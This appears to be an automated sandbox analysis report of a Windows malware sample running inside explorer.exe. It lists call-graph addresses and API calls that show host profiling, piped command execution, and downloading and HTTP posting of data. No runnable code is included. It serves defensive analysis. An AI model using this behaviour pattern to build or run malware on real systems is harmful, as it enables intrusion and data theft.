13a6618 3240->3251 3243 13a67df 3243->3214 3247 13aa0b0 NtAllocateVirtualMemory 3246->3247 3249 13a7860 3247->3249 3248 13a5bd7 3248->3231 3248->3234 3249->3248 3250 13a6814 NtFreeVirtualMemory 3249->3250 3250->3248 3252 13a6659 3251->3252 3253 13a666b RtlInitUnicodeString NtCreateFile 3252->3253 3254 13a6711 3253->3254 3254->3243 3255 13a6728 NtWriteFile 3254->3255 3256 13a6790 NtClose 3255->3256 3256->3243 3258 13a9674 3257->3258 3259 13a6886 SHGetFolderPathW 3258->3259 3260 13a68af 3259->3260 3261 13aa0b0 NtAllocateVirtualMemory 3260->3261 3262 13a68bb 3261->3262 3263 13a68c8 3262->3263 3264 13aa01c 3 API calls 3262->3264 3263->3072 3264->3263 3266 13a9674 3265->3266 3267 13a71cb GetCursorPos 3266->3267 3268 13a5e9a wsprintfW 3267->3268 3269 13a71de GetTickCount 3267->3269 3268->3075 3276 13a97cc RtlRandom 3269->3276 3272 13a999e 3271->3272 3273 13a99d6 CreateProcessW 3272->3273 3274 13a9a2a CloseHandle CloseHandle 3273->3274 3275 13a9a26 3273->3275 3274->3275 3275->3080 3276->3268 3278 13a9a70 3277->3278 3279 13a9b28 3278->3279 3280 13a9ace 3278->3280 3282 13a9b5d wsprintfW 3279->3282 3281 13a9b03 wsprintfW 3280->3281 3283 13a9b78 CreateProcessW 3281->3283 3282->3283 3284 13a9bcb 3283->3284 3285 13a9bcf CloseHandle CloseHandle 3283->3285 3284->3085 3285->3284 3287 13a185d 3286->3287 3288 13a1530 Process32First 3286->3288 3287->3127 3288->3287 3291 13a1556 3288->3291 3289 13a1842 Process32Next 3289->3287 3289->3291 3290 13a9f08 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 3290->3291 3291->3289 3291->3290 3292 13a167e wsprintfA 3291->3292 3293 13a9f08 3 API calls 3292->3293 3295 13a16ae 3293->3295 3294 13a9f08 3 API calls 3294->3295 3295->3294 3296 13a1718 wsprintfA 3295->3296 3297 13a9f08 3 API calls 3296->3297 3300 13a1748 3297->3300 3298 13a9f08 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 3298->3300 3299 13a14d8 3 API calls 3299->3300 3300->3298 3300->3299 3301 13a9f08 3 API calls 3300->3301 3301->3289 3303 13a6532 3302->3303 3304 13a6544 RtlInitUnicodeString 3303->3304 3310 13a641c GetFileAttributesW 3304->3310 3307 13a658b 3307->3164 3308 13a6592 NtCreateFile 3308->3307 3309 13a65f7 NtClose 3308->3309 3309->3307 3311 13a6441 3310->3311 3311->3307 3311->3308 3313 13a9674 3312->3313 3314 13a6912 SHGetFolderPathA 3313->3314 3315 13a693b 3314->3315 3316 13aa064 NtAllocateVirtualMemory 3315->3316 3318 13a6947 3316->3318 3317 13a6954 3317->3180 3318->3317 3319 13a9f08 3 API calls 3318->3319 3319->3317 3320 13a32b8 3323 13a3288 3320->3323 3324 13a30b0 123 API calls 3323->3324 3325 13a3291 3324->3325 3326 13a32af 3325->3326 3328 13aa5cc NtDelayExecution 3325->3328 3328->3325 3369 13a3248 3370 13a326b 3369->3370 3371 13a3269 3369->3371 3372 13a3288 123 API calls 3370->3372 3372->3371 3364 13a991c 3365 13a9976 3364->3365 3366 13a9930 3364->3366 3367 13a994e VirtualFree 3366->3367 3368 13a6814 NtFreeVirtualMemory 3367->3368 3368->3365 3373 13a2200 3374 13a2245 3373->3374 3432 13a221e 3373->3432 3375 13a958c NtAllocateVirtualMemory 3374->3375 3376 13a224f 3375->3376 3376->3432 3491 13a1030 3376->3491 3378 13a2302 3379 13a1030 21 API calls 3378->3379 3380 13a239a 3379->3380 3381 13a1030 21 API calls 3380->3381 3382 13a2433 3381->3382 3383 13a1030 21 API calls 3382->3383 3384 13a24cc 3383->3384 3385 13a1030 21 API calls 3384->3385 3386 13a2565 3385->3386 3387 13a1030 21 API calls 3386->3387 3388 13a25fe 3387->3388 3389 13a1030 21 API calls 3388->3389 3390 13a2697 3389->3390 3391 13a1030 21 API calls 3390->3391 3392 13a2730 3391->3392 3393 13a1030 21 API calls 3392->3393 3394 13a27c9 3393->3394 3395 13a1030 21 API calls 3394->3395 3396 13a2862 3395->3396 3397 13a1030 21 API calls 3396->3397 3398 13a28fb 3397->3398 3399 13a958c NtAllocateVirtualMemory 3398->3399 3400 13a290e 3399->3400 3401 13a29d2 3400->3401 3402 13a5650 NtAllocateVirtualMemory 3400->3402 3400->3432 3403 13a5650 NtAllocateVirtualMemory 3401->3403 3404 13a2a73 3401->3404 3411 13a295f 3402->3411 3413 13a2a00 3403->3413 3405 13a5650 NtAllocateVirtualMemory 3404->3405 3406 13a2b14 3404->3406 3415 13a2aa1 3405->3415 3407 13a5650 NtAllocateVirtualMemory 3406->3407 3408 13a2bb5 3406->3408 3421 13a2b42 3407->3421 3409 13a2c56 3408->3409 3410 13a5650 NtAllocateVirtualMemory 3408->3410 3412 13a2cf7 3409->3412 3414 13a5650 NtAllocateVirtualMemory 3409->3414 3424 13a2be3 3410->3424 3411->3401 3420 13a9f08 3 API calls 3411->3420 3416 13a5650 NtAllocateVirtualMemory 3412->3416 3417 13a2d98 3412->3417 3413->3404 3428 13a9f08 3 API calls 3413->3428 3434 13a2c84 3414->3434 3415->3406 3430 13a9f08 3 API calls 3415->3430 3436 13a2d25 3416->3436 3418 13a2e39 3417->3418 3422 13a5650 NtAllocateVirtualMemory 3417->3422 3423 13a5650 NtAllocateVirtualMemory 3418->3423 3427 13a2eda 3418->3427 3419 13a3034 3513 13a1868 3419->3513 3425 13a29b9 3420->3425 3421->3408 3440 13a9f08 3 API calls 3421->3440 3445 13a2dc6 3422->3445 3448 13a2e67 3423->3448 3424->3409 3442 13a9f08 3 API calls 3424->3442 3431 13a9f08 3 API calls 3425->3431 3429 13a2f87 3427->3429 3433 13a5650 NtAllocateVirtualMemory 3427->3433 3435 13a2a5a 3428->3435 3429->3419 3437 13a5650 NtAllocateVirtualMemory 3429->3437 3438 13a2afb 3430->3438 3439 13a29c8 3431->3439 3457 13a2f08 3433->3457 3434->3412 3451 13a9f08 3 API calls 3434->3451 3441 13a9f08 3 API calls 3435->3441 3436->3417 3454 13a9f08 3 API calls 3436->3454 3463 13a2fb5 3437->3463 3443 13a9f08 3 API calls 3438->3443 3444 13a6814 NtFreeVirtualMemory 3439->3444 3446 13a2b9c 3440->3446 3447 13a2a69 3441->3447 3449 13a2c3d 3442->3449 3450 13a2b0a 3443->3450 3444->3401 3445->3418 3460 13a9f08 3 API calls 3445->3460 3452 13a9f08 3 API calls 3446->3452 3453 13a6814 NtFreeVirtualMemory 3447->3453 3448->3427 3468 13a9f08 3 API calls 3448->3468 3455 13a9f08 3 API calls 3449->3455 3456 13a6814 NtFreeVirtualMemory 3450->3456 3458 13a2cde 3451->3458 3459 13a2bab 3452->3459 3453->3404 3464 13a2d7f 3454->3464 3465 13a2c4c 3455->3465 3456->3406 3457->3429 3471 13a9f08 3 API calls 3457->3471 3461 13a9f08 3 API calls 3458->3461 3462 13a6814 NtFreeVirtualMemory 3459->3462 3466 13a2e20 3460->3466 3467 13a2ced 3461->3467 3462->3408 3463->3419 3478 13a9f08 3 API calls 3463->3478 3469 13a9f08 3 API calls 3464->3469 3470 13a6814 NtFreeVirtualMemory 3465->3470 3472 13a9f08 3 API calls 3466->3472 3473 13a6814 NtFreeVirtualMemory 3467->3473 3474 13a2ec1 3468->3474 3475 13a2d8e 3469->3475 3470->3409 3476 13a2f68 3471->3476 3477 13a2e2f 3472->3477 3473->3412 3479 13a9f08 3 API calls 3474->3479 3480 13a6814 NtFreeVirtualMemory 3475->3480 3481 13a9f08 3 API calls 3476->3481 3482 13a6814 NtFreeVirtualMemory 3477->3482 3483 13a3015 3478->3483 3484 13a2ed0 3479->3484 3480->3417 3485 13a2f7a 3481->3485 3482->3418 3486 13a9f08 3 API calls 3483->3486 3487 13a6814 NtFreeVirtualMemory 3484->3487 3488 13a6814 NtFreeVirtualMemory 3485->3488 3489 13a3027 3486->3489 3487->3427 3488->3429 3490 13a6814 NtFreeVirtualMemory 3489->3490 3490->3419 3492 13a10b0 3491->3492 3493 13a10c2 6 API calls 3492->3493 3539 13a1000 3493->3539 3495 13a11ff CreateProcessW 3496 13a958c NtAllocateVirtualMemory 3495->3496 3497 13a1265 3496->3497 3498 13a958c NtAllocateVirtualMemory 3497->3498 3499 13a12a2 3498->3499 3500 13a14b4 3499->3500 3502 13a146c TerminateProcess CloseHandle CloseHandle CloseHandle CloseHandle 3499->3502 3503 13a12cd PeekNamedPipe 3499->3503 3504 13a1385 PeekNamedPipe 3499->3504 3506 13a1435 GetExitCodeProcess 3499->3506 3509 13a1334 ReadFile 3499->3509 3511 13a13e4 ReadFile 3499->3511 3540 13aa5cc NtDelayExecution 3499->3540 3501 13a14c6 3500->3501 3505 13a6814 NtFreeVirtualMemory 3500->3505 3501->3378 3502->3500 3503->3499 3503->3504 3504->3499 3504->3506 3505->3501 3506->3499 3507 13a145b 3506->3507 3507->3502 3510 13a9f08 3 API calls 3509->3510 3510->3504 3512 13a9f08 3 API calls 3511->3512 3512->3506 3515 13a187d 3513->3515 3538 13a19f7 3513->3538 3514 13a18aa 3517 13a18ca 3514->3517 3518 13a6814 NtFreeVirtualMemory 3514->3518 3515->3514 3516 13a6814 NtFreeVirtualMemory 3515->3516 3515->3538 3516->3514 3519 13a18ea 3517->3519 3520 13a6814 NtFreeVirtualMemory 3517->3520 3518->3517 3521 13a190a 3519->3521 3522 13a6814 NtFreeVirtualMemory 3519->3522 3520->3519 3523 13a192a 3521->3523 3524 13a6814 NtFreeVirtualMemory 3521->3524 3522->3521 3525 13a194a 3523->3525 3526 13a6814 NtFreeVirtualMemory 3523->3526 3524->3523 3527 13a196a 3525->3527 3528 13a6814 NtFreeVirtualMemory 3525->3528 3526->3525 3529 13a198a 3527->3529 3530 13a6814 NtFreeVirtualMemory 3527->3530 3528->3527 3531 13a19aa 3529->3531 3532 13a6814 NtFreeVirtualMemory 3529->3532 3530->3529 3533 13a19ca 3531->3533 3534 13a6814 NtFreeVirtualMemory 3531->3534 3532->3531 3535 13a19ea 3533->3535 3537 13a6814 NtFreeVirtualMemory 3533->3537 3534->3533 3536 13a6814 NtFreeVirtualMemory 3535->3536 3536->3538 3537->3535 3538->3432 3539->3495 3540->3499 3329 13a7774 3330 13a7662 3329->3330 3331 13a7627 InternetOpenW 3329->3331 3333 13a7791 3330->3333 3334 13a7786 InternetCloseHandle 3330->3334 3331->3330 3332 13a7667 InternetOpenUrlW 3331->3332 3332->3330 3338 13a76a3 3332->3338 3335 13a7799 InternetCloseHandle 3333->3335 3336 13a77a4 3333->3336 3334->3333 3335->3336 3337 13a76ae InternetReadFile 3337->3338 3338->3330 3338->3337 3339 13a958c NtAllocateVirtualMemory 3338->3339 3340 13a97f4 3 API calls 3338->3340 3339->3338 3340->3338 3341 13a9bf4 3342 13a9c75 3341->3342 3343 13a9c12 3341->3343 3344 13a9c3e CreateFileMappingA 3343->3344 3344->3342 3345 13a9c7c MapViewOfFile 3344->3345 3345->3342 3348 13a9caf 3345->3348 3346 13a9d7b VirtualFree 3347 13a6814 NtFreeVirtualMemory 3346->3347 3350 13a9dac UnmapViewOfFile CloseHandle 3347->3350 3348->3346 3349 13a958c NtAllocateVirtualMemory 3348->3349 3351 13a9ce5 3349->3351 3350->3342 3352 13a9f08 3 API calls 3351->3352 3353 13a9d37 3352->3353 3354 13a9f08 3 API calls 3353->3354 3355 13a9d49 3354->3355 3356 13aa064 NtAllocateVirtualMemory 3355->3356 3357 13a9d5f 3356->3357 3358 13a6814 NtFreeVirtualMemory 3357->3358 3358->3346 3359 13a6464 3360 13a647b 3359->3360 3361 13a648a RtlInitUnicodeString NtOpenFile 3360->3361 3362 13a64ef 3361->3362 3363 13a64f3 NtClose 3361->3363 3363->3362

                                                                                                                      Executed Functions

                                                                                                                      Function 013A6984 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 202COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 0 13a6984-13a69bd call 13a958c 3 13a69bf-13a69c1 0->3 4 13a69c6-13a69e7 GetAdaptersInfo 0->4 5 13a6d4a-13a6d51 3->5 6 13a69ed-13a6a20 call 13a958c GetAdaptersInfo call 13a96d0 4->6 7 13a6bd6-13a6bdc 4->7 16 13a6a25-13a6a28 6->16 9 13a6be8-13a6c06 call 13a958c 7->9 10 13a6bde-13a6be3 call 13a6814 7->10 17 13a6c0c-13a6c23 GetComputerNameExA 9->17 18 13a6d45 9->18 10->9 19 13a6a2a-13a6a37 16->19 20 13a6a39-13a6a41 16->20 21 13a6c89-13a6ca0 GetComputerNameExA 17->21 22 13a6c25-13a6c3c call 13a96d0 17->22 18->5 26 13a6a46-13a6a5e wsprintfA 19->26 20->26 24 13a6d3b-13a6d40 call 13a6814 21->24 25 13a6ca6-13a6cab 21->25 33 13a6c3e-13a6c4b 22->33 34 13a6c4d-13a6c55 22->34 24->18 29 13a6cbc-13a6cc3 25->29 30 13a6cad-13a6cba 25->30 31 13a6a62-13a6a6a 26->31 35 13a6ccb-13a6ce2 call 13a96d0 29->35 30->35 32 13a6a76-13a6a85 31->32 36 13a6a8b-13a6a90 32->36 37 13a6b52-13a6b69 call 13a96d0 32->37 38 13a6c5a-13a6c85 wsprintfA 33->38 34->38 47 13a6cf6-13a6cfe 35->47 48 13a6ce4-13a6cf4 35->48 41 13a6a92-13a6aa9 call 13a96d0 36->41 42 13a6ad3-13a6aea call 13a96d0 36->42 49 13a6b7a-13a6b82 37->49 50 13a6b6b-13a6b78 37->50 38->21 55 13a6aba-13a6ac2 41->55 56 13a6aab-13a6ab8 41->56 57 13a6afb-13a6b03 42->57 58 13a6aec-13a6af9 42->58 53 13a6d06-13a6d37 wsprintfA 47->53 48->53 54 13a6b87-13a6bb9 wsprintfA 49->54 50->54 53->24 59 13a6bbb 54->59 60 13a6bbd-13a6bd0 54->60 61 13a6ac7-13a6ad1 55->61 56->61 62 13a6b08-13a6b0d 57->62 58->62 59->7 60->7 60->31 63 13a6b12-13a6b4d wsprintfA 61->63 62->63 63->32
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 013A958C: NtAllocateVirtualMemory.NTDLL ref: 013A95C2
                                                                                                                      • GetAdaptersInfo.IPHLPAPI ref: 013A69D0
                                                                                                                      • GetAdaptersInfo.IPHLPAPI ref: 013A6A07
                                                                                                                      • wsprintfA.USER32 ref: 013A6A50
                                                                                                                      • wsprintfA.USER32 ref: 013A6B3B
                                                                                                                      • wsprintfA.USER32 ref: 013A6B9F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: wsprintf$AdaptersInfo$AllocateMemoryVirtual
                                                                                                                      • String ID: o
                                                                                                                      • API String ID: 2074107575-252678980
                                                                                                                      • Opcode ID: bb5e8bd85d81c0865c55c292e8f5dc328cf4844b27724cf06f1d0ac9af01af05
                                                                                                                      • Instruction ID: ea748272eb98de524d87c14316dcdf98ff2926b8f84bfa7150cf5e8e9cd05992
                                                                                                                      • Opcode Fuzzy Hash: bb5e8bd85d81c0865c55c292e8f5dc328cf4844b27724cf06f1d0ac9af01af05
                                                                                                                      • Instruction Fuzzy Hash: 9CA1BC76209B84C6DB60CB19F49439AB7A4F788798F845525EACE83B68EF3CC544CB40
                                                                                                                      Function 013A5904 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 164 13a5904-13a593b GetAdaptersInfo 165 13a5988-13a598e 164->165 166 13a593d-13a595d call 13a958c GetAdaptersInfo 164->166 168 13a599a 165->168 169 13a5990-13a5995 call 13a6814 165->169 173 13a5961-13a596d 166->173 172 13a599f-13a59a3 168->172 169->168 174 13a596f-13a5971 173->174 175 13a5973-13a5986 173->175 174->172 175->165 175->173
                                                                                                                      APIs
                                                                                                                      • GetAdaptersInfo.IPHLPAPI ref: 013A592C
                                                                                                                        • Part of subcall function 013A958C: NtAllocateVirtualMemory.NTDLL ref: 013A95C2
                                                                                                                      • GetAdaptersInfo.IPHLPAPI ref: 013A5957
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AdaptersInfo$AllocateMemoryVirtual
                                                                                                                      • String ID: o
                                                                                                                      • API String ID: 2718687846-252678980
                                                                                                                      • Opcode ID: 4e81b31fdadc980245d5dae740b1421522dfc600825620bc8eff45fa53ea0adf
                                                                                                                      • Instruction ID: 533e77ec1c8accba92ad9e0c052393bc57375adab054244ab145f9fc8551c630
                                                                                                                      • Opcode Fuzzy Hash: 4e81b31fdadc980245d5dae740b1421522dfc600825620bc8eff45fa53ea0adf
                                                                                                                      • Instruction Fuzzy Hash: B901B372508B04C6DB309B15E45435ABBA0F7C97ACF840629E6CD4BB68DB3CC684CF44
                                                                                                                      Function 013A7318 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 176 13a7318-13a7348 call 13a9674 GetUserNameA 179 13a734a-13a735d wsprintfA 176->179 180 13a7363-13a7371 176->180 179->180
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: NameUserwsprintf
                                                                                                                      • String ID: jones
                                                                                                                      • API String ID: 54179028-3844744938
                                                                                                                      • Opcode ID: a005ed5bfa22ce0381172d728ca994239463a66100743b26af83be9f7c987c3c
                                                                                                                      • Instruction ID: 1d3cb8474f7d7bb0cdcbb5399216d199b34e0810e65074ff777ec01d6188696c
                                                                                                                      • Opcode Fuzzy Hash: a005ed5bfa22ce0381172d728ca994239463a66100743b26af83be9f7c987c3c
                                                                                                                      • Instruction Fuzzy Hash: 56F07D71224A8792EB60DF54E8847E97721FF90748FC05121A1CE56DA8DF7DC70ADB41
                                                                                                                      Function 013A8BA8 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 181 13a8ba8-13a8bc3 call 13a72cc 184 13a8bcc-13a8be0 call 13a96d0 181->184 185 13a8bc5-13a8bc7 181->185 189 13a8bee-13a8bf3 184->189 190 13a8be2-13a8bec 184->190 186 13a8ccc-13a8cd3 185->186 191 13a8bf8-13a8c09 call 13aa01c 189->191 190->191 194 13a8c0b-13a8c0d 191->194 195 13a8c12-13a8c4b call 13a9674 FindFirstFileW 191->195 194->186 198 13a8cbd-13a8cc7 call 13a6814 195->198 199 13a8c4d-13a8c52 195->199 198->186 199->198 201 13a8c54-13a8c69 FindNextFileW 199->201 203 13a8c6b 201->203 204 13a8c6d-13a8c73 201->204 203->198 205 13a8c77-13a8ca4 call 13aa1e8 call 13a5ac0 204->205 206 13a8c75 204->206 211 13a8cbb 205->211 212 13a8ca6-13a8cb9 LoadLibraryW 205->212 206->198 211->199 212->198
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: DirectorySystem
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2188284642-0
                                                                                                                      • Opcode ID: 389ec66785aca711388ae230cdc2665dda1444623b8b65d447f8ab9259c927d9
                                                                                                                      • Instruction ID: 1217d6429fcfefb09af751b190a6887a520a9315d3aa6aee4e0f609521ee502c
                                                                                                                      • Opcode Fuzzy Hash: 389ec66785aca711388ae230cdc2665dda1444623b8b65d447f8ab9259c927d9
                                                                                                                      • Instruction Fuzzy Hash: 15312372219A85D6DB20DB18F48835AB764F7D4369FD00765E6EE86AA8DF3CC544CF00
                                                                                                                      Function 013A958C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18memorynativeCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 223 13a958c-13a95ca NtAllocateVirtualMemory 224 13a95db-13a95e4 223->224 225 13a95cc-13a95d6 call 13a9674 223->225 225->224
                                                                                                                      APIs
                                                                                                                      • NtAllocateVirtualMemory.NTDLL ref: 013A95C2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 2167126740-2766056989
                                                                                                                      • Opcode ID: d9a223498249f4c3c090322a89b85a3a438a55c178209e3767addec7786668fc
                                                                                                                      • Instruction ID: f9075bad76e465ac2dc8dca32a5e2664ba5d71de79b1237c57edb27d54cc1c13
                                                                                                                      • Opcode Fuzzy Hash: d9a223498249f4c3c090322a89b85a3a438a55c178209e3767addec7786668fc
                                                                                                                      • Instruction Fuzzy Hash: FEE0C9B2228A8582D750DF69E45474BB761FB857B8F805305FAAA16BE8CB7CC108CF00
                                                                                                                      Function 013A4004 Relevance: 1.6, APIs: 1, Instructions: 53filenetworkCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 227 13a4004-13a404b 228 13a404d-13a406d InternetReadFile 227->228 229 13a406f-13a4074 228->229 230 13a40cd 228->230 229->230 232 13a4076-13a4093 call 13a98b0 229->232 231 13a40d2-13a40da 230->231 235 13a4099-13a40cb call 13a95e8 232->235 236 13a4095-13a4097 232->236 235->228 236->231
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileInternetRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 778332206-0
                                                                                                                      • Opcode ID: 97b87ae50f1853fbe220b74755e22490f7afaba21d5baf80783810c8043fd314
                                                                                                                      • Instruction ID: c2c454f03b9dd31565520ac6eec40b5094b6add9a5b0fd0fa7f16c609361e6cf
                                                                                                                      • Opcode Fuzzy Hash: 97b87ae50f1853fbe220b74755e22490f7afaba21d5baf80783810c8043fd314
                                                                                                                      • Instruction Fuzzy Hash: 37112C3232868587D760CA19E4547AAA7E5F788788F844125EB8D83B58EF7DC615CF00
                                                                                                                      Function 013A6814 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 243 13a6814-13a682c 244 13a682e-13a684b NtFreeVirtualMemory 243->244 245 13a684f-13a6853 243->245 244->245
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeMemoryVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3963845541-0
                                                                                                                      • Opcode ID: 9dbb0ae3b12abb029211b0ba8255b4432c8abfcc7eb55f432a9f85dcaf06cc50
                                                                                                                      • Instruction ID: 823fea68318387afb3b0bc04b153563cc6861f855493437591032a2f161517c1
                                                                                                                      • Opcode Fuzzy Hash: 9dbb0ae3b12abb029211b0ba8255b4432c8abfcc7eb55f432a9f85dcaf06cc50
                                                                                                                      • Instruction Fuzzy Hash: 82E0EC72908A8182D7209B64E4083897B74F385778F944305EBF802AE8CF7CC289CB01
                                                                                                                      Function 013AA5CC Relevance: 1.5, APIs: 1, Instructions: 11nativeCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 246 13aa5cc-13aa5f8 NtDelayExecution
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: DelayExecution
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1249177460-0
                                                                                                                      • Opcode ID: 8d417d5b3bbdd0104a031ce28197241340a162a37eadbb870a06c08a322a4f93
                                                                                                                      • Instruction ID: 9b5820cd9715459cf060cfc4a1c409ede275838028893095ce93a43c36e22009
                                                                                                                      • Opcode Fuzzy Hash: 8d417d5b3bbdd0104a031ce28197241340a162a37eadbb870a06c08a322a4f93
                                                                                                                      • Instruction Fuzzy Hash: E6D0C77270868087DB145B14F44524A7760FB95304FD04519E6CD45B54DA3CC225CF04
                                                                                                                      Function 013A40DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122networkCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: HttpRequest$OpenSend$InternetOption
                                                                                                                      • String ID: Content-Type: application/x-www-form-urlencoded
                                                                                                                      • API String ID: 664753792-457374458
                                                                                                                      • Opcode ID: bfe0fd7b3358009a2497291c1585463bdadc306482fc5a601edf221433aee303
                                                                                                                      • Instruction ID: 76fcc17943eddf8bdd7cf0c794a06a4a0b9ef7f2b950c9780acd7d82b5b8b56d
                                                                                                                      • Opcode Fuzzy Hash: bfe0fd7b3358009a2497291c1585463bdadc306482fc5a601edf221433aee303
                                                                                                                      • Instruction Fuzzy Hash: C761E372208B8486E760CB54F49439AB7A4F799788F904126EBCA43F68EF7DC148CB40
                                                                                                                      Function 013A30B0 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 105 13a30b0-13a30d7 call 13a9674 call 13a5344 110 13a30d9-13a30de 105->110 111 13a30e3-13a30ea call 13a3074 105->111 112 13a323e-13a3245 110->112 115 13a30ec-13a30f1 111->115 116 13a30f6-13a3107 call 13a6e74 call 13a7134 111->116 115->112 121 13a311a-13a3122 call 13a7134 116->121 122 13a3109-13a310e 116->122 126 13a3124-13a3129 121->126 127 13a3135-13a3156 GetCurrentProcess IsWow64Process 121->127 122->121 123 13a3110-13a3115 122->123 123->112 126->127 128 13a312b-13a3130 126->128 129 13a3158-13a315d 127->129 130 13a3162-13a3169 call 13a5904 127->130 128->112 129->112 133 13a316b-13a3170 130->133 134 13a3175-13a3189 call 13a96d0 130->134 133->112 137 13a318b-13a3195 134->137 138 13a3197-13a319c 134->138 139 13a31a1-13a31bf CreateMutexW 137->139 138->139 140 13a31c1-13a31d3 GetLastError 139->140 141 13a31d5-13a31e2 139->141 140->141 142 13a31e4-13a31fb GetModuleHandleW call 13a3bd0 140->142 141->112 145 13a31fd-13a3202 142->145 146 13a3204-13a320b call 13a59a4 142->146 145->112 149 13a320d-13a3212 146->149 150 13a3214-13a321b call 13a5880 146->150 149->112 153 13a321d-13a3222 150->153 154 13a3224-13a3230 call 13aab3c call 13a52fc 150->154 153->112 158 13a3235-13a323a 154->158 158->112
